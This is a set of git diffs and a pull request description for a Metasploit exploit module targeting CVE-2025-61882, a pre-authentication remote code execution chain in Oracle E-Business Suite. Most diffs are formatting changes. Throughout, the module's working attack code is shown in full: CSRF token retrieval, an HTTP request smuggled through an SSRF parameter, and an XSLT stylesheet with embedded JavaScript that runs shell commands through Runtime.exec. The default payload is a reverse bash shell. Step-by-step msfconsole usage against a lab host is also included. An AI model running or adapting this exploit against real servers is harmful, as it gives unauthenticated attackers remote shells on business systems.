+           'https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/'],
           ['URL', 'https://www.oracle.com/security-alerts/alert-cve-2025-61882.html']
         ],
         'Targets' => [
           [
             'Linux/Unix (Interactive Shell)',
             {
-              'Platform' => ['unix', 'linux'],
+              'Platform' => %w[unix linux],
               'Arch' => ARCH_CMD,
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_bash' # Universal payload - Feel free to use meterpreter payloads for more features 
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
               }
             }
           ],
@@ -60,6 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DefaultTarget' => 0,
         'DisclosureDate' => '2025-10-04',
         'DefaultOptions' => {
+          # Handler delay
           'WfsDelay' => 10
         },
         'Notes' => {
@@ -71,18 +75,17 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      Opt::RPORT(8000),
-      OptString.new('TARGETURI', [true, 'Base path to Oracle EBS', '/']),
-      OptString.new('SRVHOST', [true, 'The local host to listen on for XSL callback', '0.0.0.0']),
-      OptPort.new('SRVPORT', [true, 'The local port to listen on for XSL callback', 8080]),
-      OptInt.new('HTTP_TIMEOUT', [true, 'Time to wait for target to fetch XSL (seconds)', 20]),
-      OptInt.new('SHELL_TIMEOUT', [true, 'Time to wait for shell after XSL delivery (seconds)', 30]),
-    ])
+                       Opt::RPORT(8000),
+                       OptString.new('TARGETURI', [true, 'Base path to Oracle EBS', '/']),
+                       OptString.new('SRVHOST', [true, 'The local host to listen on for XSL callback', '0.0.0.0']),
+                       OptPort.new('SRVPORT', [true, 'The local port to listen on for XSL callback', 8080]),
+                       OptInt.new('HTTP_TIMEOUT', [true, 'Time to wait for target to fetch XSL (seconds)', 20]),
+                       OptInt.new('SHELL_TIMEOUT', [true, 'Time to wait for shell after XSL delivery (seconds)', 30])
+                     ])
   end
 
   def check
-
-    vprint_status("Checking if target is vulnerable...")
+    vprint_status('Checking if target is vulnerable...')
 
     return CheckCode::Safe unless oracle_ebs_detected?
 
@@ -104,11 +107,11 @@ class MetasploitModule < Msf::Exploit::Remote
       xsl_content = generate_xsl_payload
 
       send_response(cli, xsl_content, {
-        'Content-Type' => 'application/xml',
-        'Content-Length' => xsl_content.length.to_s,
-        'Connection' => 'close'
-      })
-      
+                      'Content-Type' => 'application/xml',
+                      'Content-Length' => xsl_content.length.to_s,
+                      'Connection' => 'close'
+                    })
+
       # Mark XSL file as served
       @xsl_served = true
       print_good("XSL payload delivered successfully to #{cli.peerhost} (#{xsl_content.length} bytes)")
@@ -120,24 +123,25 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def generate_xsl_payload
+    # Generate XSLT payload that will execute commands
 
     command = payload.encoded
     vprint_status("Generated command: #{command}")
 
     # Adapt the command to the platform
-    case target['Platform']
-    when 'win'
-      base_cmd = ['cmd.exe', '/c']
-    else
-      base_cmd = ['sh', '-c']
-    end
+    base_cmd = case target['Platform']
+               when 'win'
+                 ['cmd.exe', '/c']
+               else
+                 ['sh', '-c']
+               end
 
     # Escaping apostrophes and backslashes
-    escaped_command = command.gsub("\\", "\\\\\\\\").gsub("'", "\\\\'")
+    escaped_command = command.gsub('\\', '\\\\\\\\').gsub("'", "\\\\'")
 
     js_vars = Rex::RandomIdentifier::Generator.new({ language: :javascript })
     # JavaScript code that will be executed server side via XSLT
-    js = %Q|
+    js = %|
     var #{js_vars[:string_c]} = java.lang.Class.forName('java.lang.String');
     var #{js_vars[:cmds]} = java.lang.reflect.Array.newInstance(#{js_vars[:string_c]}, 3);
     java.lang.reflect.Array.set(#{js_vars[:cmds]}, 0, '#{base_cmd[0]}');
@@ -152,7 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote
     encoded_js = Rex::Text.encode_base64(js)
 
     # Generate XSLT
-    xsl = %Q|<?xml version="1.0" encoding="UTF-8"?>
+    %|<?xml version="1.0" encoding="UTF-8"?>
 <xsl:stylesheet version="1.0"
     xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
     xmlns:b64="http://www.oracle.com/XSL/Transform/java/sun.misc.BASE64Decoder"
@@ -168,8 +172,6 @@ class MetasploitModule < Msf::Exploit::Remote
         <xsl:value-of select="$code"/>
     </xsl:template>
 </xsl:stylesheet>|
-
-    xsl
   end
 
   def exploit
@@ -191,7 +193,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("XSL payload will be served at: #{xsl_url}")
 
     # Step 2: Get CSRF token
-    print_status("Retrieving CSRF token from target...")
+    print_status('Retrieving CSRF token from target...')
     csrf_token = retrieve_csrf_token
 
     fail_with(Failure::Unknown, 'Could not retrieve CSRF token') unless csrf_token
@@ -199,60 +201,59 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good("CSRF token retrieved: #{csrf_token}")
 
     # Step 3: Smuggle payload
-    print_status("Creating HTTP request smuggling payload...")
+    print_status('Creating HTTP request smuggling payload...')
     smuggle_payload = create_smuggle_payload
 
     vprint_status("Smuggled payload created (#{smuggle_payload.length} bytes)")
 
     # Step 4: Send exploit request
-    print_status("Triggering exploitation via UiServlet...")
+    print_status('Triggering exploitation via UiServlet...')
     send_exploit_request(smuggle_payload)
 
     # Step 5: Wait for XSLT file download
     print_status("Keeping HTTP server alive, waiting for callback to #{datastore['LHOST']}:#{datastore['LPORT']}...")
-   
-	begin
-	  # Wait for XSL request
-	  retry_until_truthy(timeout: datastore['HTTP_TIMEOUT']) do
-	    @xsl_served
-	  end
-	  
-	  # Wait for shell connection
-	  print_status("Waiting up to #{datastore['SHELL_TIMEOUT']} seconds for reverse shell connection...")
-	 	  retry_until_truthy(timeout: datastore['SHELL_TIMEOUT']) do
-	    session_created?
-	  end
-	  
-	  print_good("Session created successfully!")
-	  @session_created = true
 
-	rescue ::Timeout::Error => e
-	  if !@xsl_served
-	    print_error("XSL request timeout (#{datastore['HTTP_TIMEOUT']}s) expired")
-	  else
-	    print_error("Shell timeout (#{datastore['SHELL_TIMEOUT']}s) expired")
-	  end
-	end
+    begin
+      # Wait for XSL request
+      retry_until_truthy(timeout: datastore['HTTP_TIMEOUT']) do
+        @xsl_served
+      end
+
+      # Wait for shell connection
+      print_status("Waiting up to #{datastore['SHELL_TIMEOUT']} seconds for reverse shell connection...")
+      retry_until_truthy(timeout: datastore['SHELL_TIMEOUT']) do
+        session_created?
+      end
+
+      print_good('Session created successfully!')
+      @session_created = true
+    rescue ::Timeout::Error
+      if !@xsl_served
+        print_error("XSL request timeout (#{datastore['HTTP_TIMEOUT']}s) expired")
+      else
+        print_error("Shell timeout (#{datastore['SHELL_TIMEOUT']}s) expired")
+      end
+    end
   end
 
   def retrieve_csrf_token
     res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'OA_HTML', 'runforms.jsp'),
-      'keep_cookies' => true
-    })
+                             'method' => 'GET',
+                             'uri' => normalize_uri(target_uri.path, 'OA_HTML', 'runforms.jsp'),
+                             'keep_cookies' => true
+                           })
 
     return nil unless res
 
     res = send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'OA_HTML', 'JavaScriptServlet'),
-      'headers' => {
-        'CSRF-XHR' => 'YES',
-        'FETCH-CSRF-TOKEN' => '1'
-      },
-      'keep_cookies' => true
-    })
+                             'method' => 'POST',
+                             'uri' => normalize_uri(target_uri.path, 'OA_HTML', 'JavaScriptServlet'),
+                             'headers' => {
+                               'CSRF-XHR' => 'YES',
+                               'FETCH-CSRF-TOKEN' => '1'
+                             },
+                             'keep_cookies' => true
+                           })
 
     if res && res.code == 200 && res.body
       parts = res.body.split(':')
@@ -266,13 +267,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def create_smuggle_payload
-
     srvhost = datastore['SRVHOST']
     srvport = datastore['SRVPORT']
 
-    if srvhost == '0.0.0.0'
-      srvhost = Rex::Socket.source_address(rhost)
-    end
+    srvhost = Rex::Socket.source_address(rhost) if srvhost == '0.0.0.0'
 
     smuggle_request = "POST /OA_HTML/help/../ieshostedsurvey.jsp HTTP/1.2\r\n"
     smuggle_request += "Host: #{srvhost}:#{srvport}\r\n"
@@ -281,15 +279,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Add sessions cookies
     cookies = get_cookies
-    if cookies && !cookies.empty?
-      smuggle_request += "Cookie: #{cookies}\r\n"
-    end
+    smuggle_request += "Cookie: #{cookies}\r\n" if cookies && !cookies.empty?
 
     # Add POST request via CRLF
     smuggle_request += "\r\n\r\n\r\nPOST /"
 
     vprint_status("Smuggled request will target: #{srvhost}:#{srvport}")
-    vprint_status("Full smuggled request:")
+    vprint_status('Full smuggled request:')
     vprint_line(smuggle_request) if datastore['VERBOSE']
 
     # Encode payload in HTML entities
@@ -300,39 +296,38 @@ class MetasploitModule < Msf::Exploit::Remote
     payload = payload.sub(/^(?:POST|GET) /, '')
 
     # Encode in HTML entities
-    payload = Rex::Text.html_encode(payload)
-    
+    Rex::Text.html_encode(payload)
   end
 
   def send_exploit_request(encoded_payload)
     # Encoded payload is inserted in return_url (SSRF)
-    
-    xml = %Q|<?xml version="1.0" encoding="UTF-8"?>\
+
+    xml = %(<?xml version="1.0" encoding="UTF-8"?>\
     <initialize>\
     <param name="init_was_saved">test</param>\
     <param name="return_url">http://apps.example.com:7201#{encoded_payload}</param>\
     <param name="ui_def_id">0</param>\
     <param name="config_effective_usage_id">0</param>\
     <param name="ui_type">Applet</param>\
-    </initialize>|
-    
-    vprint_status("Sending exploit to UiServlet...")
+    </initialize>)
+
+    vprint_status('Sending exploit to UiServlet...')
 
     res = send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'OA_HTML', 'configurator', 'UiServlet'),
-      'vars_post' => {
-        'redirectFromJsp' => '1',
-        'getUiType' => xml
-      },
-      'keep_cookies' => true
-    })
+                             'method' => 'POST',
+                             'uri' => normalize_uri(target_uri.path, 'OA_HTML', 'configurator', 'UiServlet'),
+                             'vars_post' => {
+                               'redirectFromJsp' => '1',
+                               'getUiType' => xml
+                             },
+                             'keep_cookies' => true
+                           })
 
     if res
       vprint_status("UiServlet responded with: #{res.code}")
       vprint_status("Response body length: #{res.body.length} bytes") if res.body
     else
-      print_warning("No response from UiServlet (this might be normal)")
+      print_warning('No response from UiServlet (this might be normal)')
     end
 
     res
@@ -348,17 +343,17 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def oracle_ebs_detected?
     res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'OA_HTML', 'runforms.jsp')
-    })
+                             'method' => 'GET',
+                             'uri' => normalize_uri(target_uri.path, 'OA_HTML', 'runforms.jsp')
+                           })
 
     res && (res.headers['Server']&.include?('Oracle') ||
-            res.body&.include?('Oracle'))  # maybe to adapt for different versions. Fully Tested on version 12.2.12
-  rescue
+            res.body&.include?('Oracle')) # maybe to adapt for different versions. Fully Tested on version 12.2.12
+  rescue StandardError
     false
   end
 
-  def vulnerable_servlet_accessible?(csrf_token)
+  def vulnerable_servlet_accessible?(_csrf_token)
     test_xml = '<?xml version="1.0" encoding="UTF-8"?>' \
                '<initialize>' \
                '<param name="init_was_saved">test</param>' \
@@ -369,17 +364,17 @@ class MetasploitModule < Msf::Exploit::Remote
                '</initialize>'
 
     res = send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'OA_HTML', 'configurator', 'UiServlet'),
-      'vars_post' => {
-        'redirectFromJsp' => '1',
-        'getUiType' => test_xml
-      },
-      'keep_cookies' => true
-    })
+                             'method' => 'POST',
+                             'uri' => normalize_uri(target_uri.path, 'OA_HTML', 'configurator', 'UiServlet'),
+                             'vars_post' => {
+                               'redirectFromJsp' => '1',
+                               'getUiType' => test_xml
+                             },
+                             'keep_cookies' => true
+                           })
 
-    res && (res.code == 200 || res.code == 302)
-  rescue
+    res && [200, 302].include?(res.code)
+  rescue StandardError
     false
   end
 end

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Retry 
 
   def initialize(info = {})
     super(
@@ -203,7 +204,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Step 3: Smuggle payload
     print_status("Creating HTTP request smuggling payload...")
-    smuggle_payload = create_smuggle_payload(xsl_url)
+    smuggle_payload = create_smuggle_payload
 
     vprint_status("Smuggled payload created (#{smuggle_payload.length} bytes)")
 
@@ -213,57 +214,29 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Step 5: Wait for XSLT file download
     print_status("Keeping HTTP server alive, waiting for callback to #{datastore['LHOST']}:#{datastore['LPORT']}...")
-    print_status("(Press Ctrl-C to stop)")
+   
+	begin
+	  # Wait for XSL request
+	  retry_until_truthy(timeout: datastore['HTTP_TIMEOUT']) do
+	    @xsl_served
+	  end
+	  
+	  # Wait for shell connection
+	  print_status("Waiting up to #{datastore['SHELL_TIMEOUT']} seconds for reverse shell connection...")
+	 	  retry_until_truthy(timeout: datastore['SHELL_TIMEOUT']) do
+	    session_created?
+	  end
+	  
+	  print_good("Session created successfully!")
+	  @session_created = true
 
-    # Wait < HTTP_TIMEOUT seconds for XSL download
-    timeout = datastore['HTTP_TIMEOUT']
-    waited = 0
-
-    while waited < timeout
-      if @xsl_served
-        
-        # Wait for shell connection
-        shell_timeout = datastore['SHELL_TIMEOUT']
-        print_status("Waiting up to #{shell_timeout} seconds for reverse shell connection...")
-
-        shell_waited = 0
-        while shell_waited < shell_timeout
-          # Check session creation
-          if framework.sessions.length > 0
-            print_good("Session created successfully!")
-            @session_created = true
-            break
-          end
-
-          sleep(1)
-          shell_waited += 1
-
-          if shell_waited % 5 == 0
-            vprint_status("Waiting for shell... (#{shell_waited}/#{shell_timeout}s)")
-          end
-        end
-
-        break
-      end
-
-      sleep(1)
-      waited += 1
-
-      # Activity feedback
-      if waited % 5 == 0
-        vprint_status("Waiting for XSL request... (#{waited}/#{timeout}s)")
-      end
-    end
-
-    unless @xsl_served
-      print_error("Timeout waiting for target to fetch XSL payload")
-    end
-
-    unless @session_created
-      if @xsl_served
-        print_error("XSL was delivered but no session was created")
-      end
-    end
+	rescue ::Timeout::Error => e
+	  if !@xsl_served
+	    print_error("XSL request timeout (#{datastore['HTTP_TIMEOUT']}s) expired")
+	  else
+	    print_error("Shell timeout (#{datastore['SHELL_TIMEOUT']}s) expired")
+	  end
+	end
   end
 
   def retrieve_csrf_token
@@ -296,7 +269,7 @@ class MetasploitModule < Msf::Exploit::Remote
     nil
   end
 
-  def create_smuggle_payload(xsl_url)
+  def create_smuggle_payload
 
     srvhost = datastore['SRVHOST']
     srvport = datastore['SRVPORT']

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -138,15 +138,16 @@ class MetasploitModule < Msf::Exploit::Remote
     # Escaping apostrophes and backslashes
     escaped_command = command.gsub("\\", "\\\\\\\\").gsub("'", "\\\\'")
 
+    js_vars = Rex::RandomIdentifier::Generator.new({ language: :javascript })
     # JavaScript code that will be executed server side via XSLT
     js = %Q|
-    var stringc = java.lang.Class.forName('java.lang.String');
-    var cmds = java.lang.reflect.Array.newInstance(stringc, 3);
-    java.lang.reflect.Array.set(cmds, 0, '#{base_cmd[0]}');
-    java.lang.reflect.Array.set(cmds, 1, '#{base_cmd[1]}');
-    java.lang.reflect.Array.set(cmds, 2, '#{escaped_command}');
-    var runtime = java.lang.Runtime.getRuntime();
-    var proc = runtime.exec(cmds);
+    var #{js_vars[:string_c]} = java.lang.Class.forName('java.lang.String');
+    var #{js_vars[:cmds]} = java.lang.reflect.Array.newInstance(#{js_vars[:string_c]}, 3);
+    java.lang.reflect.Array.set(#{js_vars[:cmds]}, 0, '#{base_cmd[0]}');
+    java.lang.reflect.Array.set(#{js_vars[:cmds]}, 1, '#{base_cmd[1]}');
+    java.lang.reflect.Array.set(#{js_vars[:cmds]}, 2, '#{escaped_command}');
+    var #{js_vars[:run_time]} = java.lang.Runtime.getRuntime();
+    var #{js_vars[:proc]} = #{js_vars[:run_time]}.exec(#{js_vars[:cmds]});
     1
     |
 

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -60,7 +60,6 @@ class MetasploitModule < Msf::Exploit::Remote
         'DefaultTarget' => 0,
         'DisclosureDate' => '2025-10-04',
         'DefaultOptions' => {
-          # Handler delay
           'WfsDelay' => 10
         },
         'Notes' => {

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -45,7 +45,8 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => %w[unix linux],
               'Arch' => ARCH_CMD,
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_bash' # Simple payload but feel free to use meterpreter ones if needed
+                'PAYLOAD' => 'cmd/unix/reverse_bash' 
+                # Simple payload but feel free to use meterpreter ones if needed
               }
             }
           ],
@@ -63,7 +64,6 @@ class MetasploitModule < Msf::Exploit::Remote
         'DefaultTarget' => 0,
         'DisclosureDate' => '2025-10-04',
         'DefaultOptions' => {
-          # Handler delay
           'WfsDelay' => 10
         },
         'Notes' => {

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -101,7 +101,6 @@ class MetasploitModule < Msf::Exploit::Remote
   def on_request_uri(cli, request)
     print_good("Received request: #{request.method} #{request.uri} from #{cli.peerhost}:#{cli.peerport}")
 
-
     if request.uri.include?('.xsl')
       print_good("Serving  XSL payload to #{cli.peerhost}...")
 

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => %w[unix linux],
               'Arch' => ARCH_CMD,
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_bash' 
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
                 # Simple payload but feel free to use meterpreter ones if needed
               }
             }
@@ -123,7 +123,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def generate_xsl_payload
-   
     command = payload.encoded
     vprint_status("Generated command: #{command}")
 

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -59,7 +59,6 @@ class MetasploitModule < Msf::Exploit::Remote
         'DefaultTarget' => 0,
         'DisclosureDate' => '2025-10-04',
         'DefaultOptions' => {
-          'PAYLOAD' => 'cmd/unix/reverse_bash',
           # Handler delay
           'WfsDelay' => 10
         },

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => %w[unix linux],
               'Arch' => ARCH_CMD,
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_bash'
+                'PAYLOAD' => 'cmd/unix/reverse_bash' # Simple payload but feel free to use meterpreter ones if needed
               }
             }
           ],

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -89,9 +89,7 @@ class MetasploitModule < Msf::Exploit::Remote
     csrf_token = retrieve_csrf_token
     return CheckCode::Unknown unless csrf_token
 
-    if vulnerable_servlet_accessible?(csrf_token)
-      return CheckCode::Appears
-    end
+    return CheckCode::Appears if vulnerable_servlet_accessible?(csrf_token)
 
     CheckCode::Safe
   end

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => ['unix', 'linux'],
               'Arch' => ARCH_CMD,
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_bash'
+                'PAYLOAD' => 'cmd/unix/reverse_bash' # Universal payload - Feel free to use meterpreter payloads for more features 
               }
             }
           ],

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -34,8 +34,10 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'References' => [
           ['CVE', '2025-61882'],
-          ['URL',
-           'https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/'],
+          [
+            'URL',
+            'https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/'
+          ],
           ['URL', 'https://www.oracle.com/security-alerts/alert-cve-2025-61882.html']
         ],
         'Targets' => [
@@ -75,13 +77,13 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-                       Opt::RPORT(8000),
-                       OptString.new('TARGETURI', [true, 'Base path to Oracle EBS', '/']),
-                       OptString.new('SRVHOST', [true, 'The local host to listen on for XSL callback', '0.0.0.0']),
-                       OptPort.new('SRVPORT', [true, 'The local port to listen on for XSL callback', 8080]),
-                       OptInt.new('HTTP_TIMEOUT', [true, 'Time to wait for target to fetch XSL (seconds)', 20]),
-                       OptInt.new('SHELL_TIMEOUT', [true, 'Time to wait for shell after XSL delivery (seconds)', 30])
-                     ])
+      Opt::RPORT(8000),
+      OptString.new('TARGETURI', [true, 'Base path to Oracle EBS', '/']),
+      OptString.new('SRVHOST', [true, 'The local host to listen on for XSL callback', '0.0.0.0']),
+      OptPort.new('SRVPORT', [true, 'The local port to listen on for XSL callback', 8080]),
+      OptInt.new('HTTP_TIMEOUT', [true, 'Time to wait for target to fetch XSL (seconds)', 20]),
+      OptInt.new('SHELL_TIMEOUT', [true, 'Time to wait for shell after XSL delivery (seconds)', 30])
+    ])
   end
 
   def check
@@ -107,10 +109,10 @@ class MetasploitModule < Msf::Exploit::Remote
       xsl_content = generate_xsl_payload
 
       send_response(cli, xsl_content, {
-                      'Content-Type' => 'application/xml',
-                      'Content-Length' => xsl_content.length.to_s,
-                      'Connection' => 'close'
-                    })
+        'Content-Type' => 'application/xml',
+        'Content-Length' => xsl_content.length.to_s,
+        'Connection' => 'close'
+      })
 
       # Mark XSL file as served
       @xsl_served = true
@@ -236,22 +238,22 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def retrieve_csrf_token
     res = send_request_cgi({
-                             'method' => 'GET',
-                             'uri' => normalize_uri(target_uri.path, 'OA_HTML', 'runforms.jsp'),
-                             'keep_cookies' => true
-                           })
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'OA_HTML', 'runforms.jsp'),
+      'keep_cookies' => true
+    })
 
     return nil unless res
 
     res = send_request_cgi({
-                             'method' => 'POST',
-                             'uri' => normalize_uri(target_uri.path, 'OA_HTML', 'JavaScriptServlet'),
-                             'headers' => {
-                               'CSRF-XHR' => 'YES',
-                               'FETCH-CSRF-TOKEN' => '1'
-                             },
-                             'keep_cookies' => true
-                           })
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'OA_HTML', 'JavaScriptServlet'),
+      'headers' => {
+        'CSRF-XHR' => 'YES',
+        'FETCH-CSRF-TOKEN' => '1'
+      },
+      'keep_cookies' => true
+    })
 
     if res && res.code == 200 && res.body
       parts = res.body.split(':')
@@ -312,14 +314,14 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status('Sending exploit to UiServlet...')
 
     res = send_request_cgi({
-                             'method' => 'POST',
-                             'uri' => normalize_uri(target_uri.path, 'OA_HTML', 'configurator', 'UiServlet'),
-                             'vars_post' => {
-                               'redirectFromJsp' => '1',
-                               'getUiType' => xml
-                             },
-                             'keep_cookies' => true
-                           })
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'OA_HTML', 'configurator', 'UiServlet'),
+      'vars_post' => {
+        'redirectFromJsp' => '1',
+        'getUiType' => xml
+      },
+      'keep_cookies' => true
+    })
 
     if res
       vprint_status("UiServlet responded with: #{res.code}")
@@ -341,9 +343,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def oracle_ebs_detected?
     res = send_request_cgi({
-                             'method' => 'GET',
-                             'uri' => normalize_uri(target_uri.path, 'OA_HTML', 'runforms.jsp')
-                           })
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'OA_HTML', 'runforms.jsp')
+    })
 
     res && (res.headers['Server']&.include?('Oracle') ||
             res.body&.include?('Oracle')) # maybe to adapt for different versions. Fully Tested on version 12.2.12
@@ -362,14 +364,14 @@ class MetasploitModule < Msf::Exploit::Remote
                '</initialize>'
 
     res = send_request_cgi({
-                             'method' => 'POST',
-                             'uri' => normalize_uri(target_uri.path, 'OA_HTML', 'configurator', 'UiServlet'),
-                             'vars_post' => {
-                               'redirectFromJsp' => '1',
-                               'getUiType' => test_xml
-                             },
-                             'keep_cookies' => true
-                           })
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'OA_HTML', 'configurator', 'UiServlet'),
+      'vars_post' => {
+        'redirectFromJsp' => '1',
+        'getUiType' => test_xml
+      },
+      'keep_cookies' => true
+    })
 
     res && [200, 302].include?(res.code)
   rescue StandardError

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -120,7 +120,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def generate_xsl_payload
-    # Generate XSLT payload that will execute commands
 
     command = payload.encoded
     vprint_status("Generated command: #{command}")


### PR DESCRIPTION
## Vulnerable Application
This module exploits CVE-2025-61882, a critical Remote Code Execution (RCE) vulnerability in Oracle E-Business Suite (EBS).
The flaw allows unauthenticated attackers to execute arbitrary code by leveraging a combination of SSRF, HTTP request smuggling and XSLT injection.
- **CVSS Score**: 9.8 Critical
- **Affected Versions**: Oracle E-Business Suite, versions 12.2.3-12.2.14
- **Tested On**: Oracle EBS 12.2.12 (Linux host)

## Testing

- App images files are available on Oracle website (Oracle Software Delivery Cloud)
- You can follow this [setup guide for Oracle EBS](https://blog.rishoradev.com/2021/04/12/oracle-ebs-r12-on-virtualbox)

**Note**: 300 Go are required and a few hours for the inital image creation


## Verification Steps
1. Start msfconsole
2. `use exploit/multi/http/oracle_ebs_cve_2025_61882_exploit_rce`
3. `set RHOST <TARGET_IP_ADDRESS>`
5. `set PAYLOAD (default is cmd/unix/reverse_bash)`
6. `set LHOST <YOUR_ATTACKER_IP>`
7. `set LPORT 4444`
8. `check`
9. `exploit`

## Scenarios

### Linux Command

```
use exploit/multi/http/oracle_ebs_cve_2025_61882_exploit_rce

msf6 exploit(multi/http/oracle_ebs_cve_2025_61882_exploit_rce) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(multi/http/oracle_ebs_cve_2025_61882_exploit_rce) > set SRVPORT 1337
SRVPORT => 1337
msf6 exploit(multi/http/oracle_ebs_cve_2025_61882_exploit_rce) > set RHOSTS 192.168.56.104
RHOSTS => 192.168.56.104

show options

Module options (exploit/multi/http/oracle_ebs_cve_2025_61882_exploit_rce):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   HTTP_TIMEOUT   20               yes       Time to wait for target to fetch XSL (seconds)
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS         192.168.56.104   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT          8000             yes       The target port (TCP)
   SHELL_TIMEOUT  30               yes       Time to wait for shell after XSL delivery (seconds)
   SRVHOST        0.0.0.0          yes       The local host to listen on for XSL callback
   SRVPORT        1337             yes       The local port to listen on for XSL callback
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                         no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI      /                yes       Base path to Oracle EBS
   URIPATH                         no        The URI to use for this exploit (default is random)
   VHOST                           no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.56.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux/Unix (Interactive Shell)


msf6 exploit(multi/http/oracle_ebs_cve_2025_61882_exploit_rce) > check
[*] 192.168.56.104:8000 - The target appears to be vulnerable.


msf6 exploit(multi/http/oracle_ebs_cve_2025_61882_exploit_rce) > exploit
[*] Exploit running as background job 7.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Starting HTTP server on 0.0.0.0:1337
